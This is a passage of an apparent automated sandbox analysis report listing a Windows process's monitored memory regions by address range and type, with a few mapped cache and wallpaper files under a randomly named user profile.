monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1585 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1586 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1587 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1588 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1589 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1590 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1591 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1592 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1593 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1594 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1595 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1596 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1597 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1598 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1599 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1600 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1601 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1602 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1603 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1604 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1605 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1606 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1607 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1608 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1609 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1610 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1611 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1612 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1613 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1614 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1615 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1616 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1617 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1618 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1619 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1620 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1621 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1622 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1623 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1624 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1625 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1626 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1627 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1628 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1629 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1630 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1631 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1632 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1633 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1634 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1635 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1636 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1637 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1638 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1639 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1640 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1641 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1642 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1643 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1644 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1645 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1646 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1647 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1648 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1650 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1651 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1652 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1654 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1655 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1656 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1658 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1659 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1660 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1662 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1663 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1664 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1666 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1667 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1668 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1669 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1670 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1671 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1672 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1673 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1674 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1675 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1676 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1677 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1678 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1679 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1680 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1681 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1682 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1683 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 1684 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1685 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1686 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1687 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1688 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1689 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 1690 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1691 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1692 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1693 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1694 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1695 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1696 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1697 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1698 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1699 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1700 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1701 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1702 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1703 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1704 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1705 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1706 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1707 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1708 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1709 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1710 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1711 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1712 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1713 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1714 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1715 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1716 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1717 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1718 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1719 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1720 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1721 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1722 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1723 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1724 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1725 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1726 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1727 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1728 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1729 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1730 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1731 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1732 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1733 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1734 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1735 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1736 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1737 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1738 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1739 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1740 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1741 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1742 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1743 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1744 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1745 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1746 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1747 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1748 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1749 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1750 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1751 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1752 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1753 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1754 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1755 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1756 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1757 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1758 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1759 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1760 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1761 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1762 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1763 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1764 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1765 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1766 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1767 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1768 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1769 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1770 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1771 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1772 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1773 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1774 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1775 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1776 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1777 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1778 start_va = 0x530000 end_va = 